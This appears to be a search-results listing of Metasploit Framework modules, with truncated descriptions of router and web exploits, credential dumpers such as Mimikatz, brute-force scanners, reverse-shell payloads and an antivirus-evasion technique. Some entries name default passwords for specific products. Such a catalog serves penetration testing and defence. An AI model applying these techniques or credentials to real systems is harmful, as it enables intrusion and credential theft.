6846 matches found
D-Link DIR615h OS Command Injection
Some D-Link Routers are vulnerable to an authenticated OS command injection on their web interface, where default credentials are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload...
MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability
This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code...
Windows Single Sign On Credential Collector (Mimikatz)
This module will collect cleartext Single Sign On credentials from the Local Security Authority using the Kiwi Mimikatz extension. Blank passwords will not be stored in the database. This module requires Metasploit: https://metasploit.com/download Current source:...
Axigen Arbitrary File Read and Delete
This module exploits a directory traversal vulnerability in the WebAdmin interface of Axigen, which allows an authenticated user to read and delete arbitrary files with SYSTEM privileges. The vulnerability is known to work on Windows platforms. This module has been tested successfully on Axigen...
Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution
This module can be used to execute a payload on MoveableType MT that exposes a CGI script, mt-upgrade.cgi usually at /mt/mt-upgrade.cgi, that is used during installation and updating of the platform. The vulnerability arises due to the following properties: 1. This script may be invoked remotely...
WordPress Plugin Advanced Custom Fields Remote File Inclusion
This module exploits a remote file inclusion flaw in the WordPress blogging software plugin known as Advanced Custom Fields. The vulnerability allows for remote file inclusion and remote code execution via the export.php script. The Advanced Custom Fields plug-in versions 3.5.1 and below are...
Microsoft SQL Server SQLi NTLM Stealer
This module can be used to help capture or relay the LM/NTLM credentials of the account running the remote SQL Server service. The module will use the SQL injection from GETPATH to connect to the target SQL Server instance and execute the native "xpdirtree" or stored procedure. The stored...
MS10-104 Microsoft Office SharePoint Server 2007 Remote Code Execution
This module exploits a vulnerability found in SharePoint Server 2007 SP2. The software contains a directory traversal, that allows a remote attacker to write arbitrary files to the filesystem, sending a specially crafted SOAP ConvertFile request to the Office Document Conversions Launcher Service...
MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution
This module exploits a type confusion vulnerability in the OLE32 component of Windows XP SP3. The vulnerability exists in the CPropertyStorage::ReadMultiple function. A Visio document with a specially crafted Summary Information Stream embedded allows to get remote code execution through Internet...
Windows Gather Local User Account Password Hashes (Registry)
This module will dump the local user accounts from the SAM database using the registry This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'English' class MetasploitModule 'Windows Gather Local User Account Passwo...
MongoDB Login Utility
This module attempts to brute force authentication credentials for MongoDB. Note that, by default, MongoDB does not require authentication. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Mongo...
VNC Authentication Scanner
This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response authentication method. This module requires Metasploit: https://metasploit.com/download Current source:...
Java MixerSequencer Object GM_Song Structure Handling Vulnerability
This module exploits a flaw within the handling of MixerSequencer objects in Java 6u18 and before. Exploitation id done by supplying a specially crafted MIDI file within an RMF File. When the MixerSequencer objects is used to play the file, the GMSong structure is populated with a function pointe...
Windows Recon Computer Browser Discovery
This module uses railgun to discover hostnames and IPs on the network. LTYPE should be set to one of the following values: WK all workstations, SVR all servers, SQL all SQL servers, DC all Domain Controllers, DCBKUP all Domain Backup Servers, NOVELL all Novell servers, PRINTSVR all Print Que...
Windows Gather Wireless Current Connection Info
This module gathers information about the current connection on each wireless lan interface on the target machine. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows Gather Wireless Curren...
Oracle RDBMS Login Utility
This module attempts to authenticate against an Oracle RDBMS instance using username and password combinations indicated by the USERFILE, PASSFILE, and USERPASSFILE options. Due to a bug in nmap versions 6.50-7.80 may not work. This module requires Metasploit: https://metasploit.com/download...
MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
This exploits a buffer overflow found in the nsiislog.dll ISAPI filter that comes with Windows Media Server. This module will also work against the 'patched' MS03-019 version. This vulnerability was addressed by MS03-022. This module requires Metasploit: https://metasploit.com/download Current...
Microsoft OWC Spreadsheet HTMLURL Buffer Overflow
This module exploits a buffer overflow in Microsoft's Office Web Components. When passing an overly long string as the "HTMLURL" parameter an attacker can execute arbitrary code. This module requires Metasploit: https://metasploit.com/download Current source:...
Samba Symlink Directory Traversal
This module exploits a directory traversal flaw in the Samba CIFS server. To exploit this flaw, a writeable share must be specified. The newly created directory will link to the root filesystem. This module requires Metasploit: https://metasploit.com/download Current source:...
Sendmail SMTP Address prescan Memory Corruption
This is a proof of concept denial of service module for Sendmail versions 8.12.8 and earlier. The vulnerability is within the prescan method when parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00 bytes can be used, limiting the likelihood for arbitrary code execution. This...
Altap Salamander 2.5 PE Viewer Buffer Overflow
This module exploits a buffer overflow in Altap Salamander 'Altap Salamander 2.5 PE Viewer Buffer Overflow', 'Description' = %q This module exploits a buffer overflow in Altap Salamander MSFLICENSE, 'Author' = 'aushack' , 'References' = 'CVE', '2007-3314' , 'BID', '24557' , 'OSVDB', '37579' ,...
Apache Module mod_rewrite LDAP Protocol Buffer Overflow
This module exploits the modrewrite LDAP protocol scheme handling flaw discovered by Mark Dowd, which produces an off-by-one overflow. Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable. This module requires REWRITEPATH to be set accurately. In addition, the target must have...
XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow
This module exploits a stack buffer overflow in XMPlay 3.3.0.4. The vulnerability is caused due to a boundary error within the parsing of playlists containing an overly long file name. This module uses the ASX file format. This module requires Metasploit: https://metasploit.com/download Current...
MS04-031 Microsoft NetDDE Service Overflow
This module exploits a stack buffer overflow in the NetDDE service, which is the precursor to the DCOM interface. This exploit effects only operating systems released prior to Windows XP SP1 2000 SP4, XP SP0. Despite Microsoft's claim that this vulnerability can be exploited without authenticatio...
Diagnostic State
This module will keep the vehicle in a diagnostic state on rounds by sending tester present packet. Module Options msf use post/hardware/automotive/diagnosticstate msf postdiagnosticstate show actions ...actions... msf postdiagnosticstate set ACTION msf postdiagnosticstate show options ...show an...
Wordpress Plugin Modern Events Calendar - Authenticated Remote Code Execution
This module allows an attacker with a privileged Wordpress account to launch a reverse shell due to an arbitrary file upload vulnerability in Wordpress plugin Modern Events Calendar .php Module Options msf use exploit/multi/http/wppluginmoderneventscalendarrce msf...
Micro Focus Operations Bridge Reporter shrboadmin default password
This module abuses a known default password on Micro Focus Operations Bridge Reporter. The 'shrboadmin' user, installed by default by the product has the password of 'shrboadmin', and allows an attacker to login to the server via SSH. This module has been tested with Micro Focus Operations Bridge...
Process Herpaderping evasion technique
This module allows you to generate a Windows executable that evades security products such as Windows Defender, Avast, etc. This uses the Process Herpaderping technique to bypass Antivirus detection. This method consists in obscuring the behavior of a running process by modifying the executable o...
Ubiquiti Configuration Importer
This module imports an Ubiquiti device configuration. The db file within the .unf backup is the data file for Unifi. This module can take either the db file or .unf. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework...
Cisco UCS Director default scpuser password
This module abuses a known default password on Cisco UCS Director. The 'scpuser' has the password of 'scpuser', and allows an attacker to login to the virtual appliance via SSH. This module has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0. Note that Cisco also mentions in...
Unix Command Shell, Pingback Reverse TCP (via netcat)
Creates a socket, send a UUID, then exit This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 99 include Msf::Payload::Single include Msf::Payload::Pingback include...
Cisco RV320/RV326 Configuration Disclosure
A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit th...
MicroFocus Secure Messaging Gateway Remote Code Execution
This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging Gateway. An unauthenticated user can execute a terminal command under the context of the web user. One of the user supplied parameters of API endpoint is used by the application without input...
lastore-daemon D-Bus Privilege Escalation
This module attempts to gain root privileges on Deepin Linux systems by using lastore-daemon to install a package. The lastore-daemon D-Bus configuration on Deepin Linux permits any user in the sudo group to install arbitrary system packages without providing a password, resulting in code executi...
Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow
This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16 by using the import command option to import a specially crafted xml file. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule...
Linux Gather Container Detection
This module attempts to determine whether the system is running inside of a container and if so, which one. This module supports detection of Docker, WSL, LXC, Podman and systemd nspawn. This module requires Metasploit: https://metasploit.com/download Current source:...
Linux Meterpreter, Reverse TCP Inline
Run the Meterpreter / Mettle server payload stageless This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Module generated by tools/modules/generatemettlepayloads.rb module MetasploitModule CachedSize = 1068952 include...
VMware VDP Known SSH Key
VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'net/ssh...
NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Buffer Overflow
The NETGEAR WNR2000 router has a stack buffer overflow vulnerability in the hiddenlangavi parameter. In order to exploit it, it is necessary to guess the value of a certain timestamp which is in the configuration of the router. An authenticated attacker can simply fetch this from a page, but an...
Firefox PDF.js Privileged Javascript Injection
This module gains remote code execution on Firefox 35-36 by abusing a privilege escalation bug in resource:// URIs. PDF.js is used to exploit the bug. This exploit requires the user to click anywhere on the page to trigger the vulnerability. This module requires Metasploit:...
ManageEngine NetFlow Analyzer Arbitrary File Download
This module exploits an arbitrary file download vulnerability in CSVServlet on ManageEngine NetFlow Analyzer. This module has been tested on both Windows and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you must escape the backslash with a backslash. This module requires...
MongoDB NoSQL Collection Enumeration Via Injection
This module can exploit NoSQL injections on MongoDB versions less than 2.4 and enumerate the collections available in the data via boolean injections. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
Linux Command Shell, Bind TCP Inline
Listen for a connection and spawn a command shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 232 include Msf::Payload::Single include Msf::Sessions::CommandShellOptions def...
Ruby on Rails Action View MIME Memory Exhaustion
This module exploits a Denial of Service DoS condition in Action View that requires a controller action. By sending a specially crafted content-type header to a Rails application, it is possible for it to store the invalid MIME type, and may eventually consume all memory if enough invalid MIMEs a...
GLPI install.php Remote Command Execution
This module exploits an arbitrary command execution vulnerability in the GLPI 'install.php' script. This module is set to ManualRanking due to this module overwriting the target database configuration, which may introduce target instability. This module requires Metasploit:...
Modbus Client Utility
This module allows reading and writing data to a PLC using the Modbus protocol. This module is based on the 'modiconstop.rb' Basecamp module from DigitalBond, as well as the mbtget perl script. This module requires Metasploit: https://metasploit.com/download Current source:...
SAP SMB Relay Abuse
This module exploits provides several SMB Relay abuse through different SAP services and functions. The attack is done through specially crafted requests including a UNC Path which will be accessing by the SAP system while trying to process the request. In order to get the hashes the...
Unix Command Shell, Reverse TCP SSL (via Ruby)
Connect back and create a command shell via Ruby, uses SSL This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 185 include Msf::Payload::Single include Msf::Sessions::CommandShellOptio...
Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution
This module abuses the "RunScript" procedure provided by the SOAP interface of Adobe InDesign Server, to execute arbitrary vbscript Windows or applescript OSX. The exploit drops the payload on the server and must be removed manually. This module requires Metasploit: https://metasploit.com/downloa...
Windows AlwaysInstallElevated MSI
This module checks the AlwaysInstallElevated registry keys which dictates if .MSI files should be installed with elevated privileges NT AUTHORITY\SYSTEM. The generated .MSI file has an embedded executable which is extracted and run by the installer. After execution the .MSI file intentionally fai...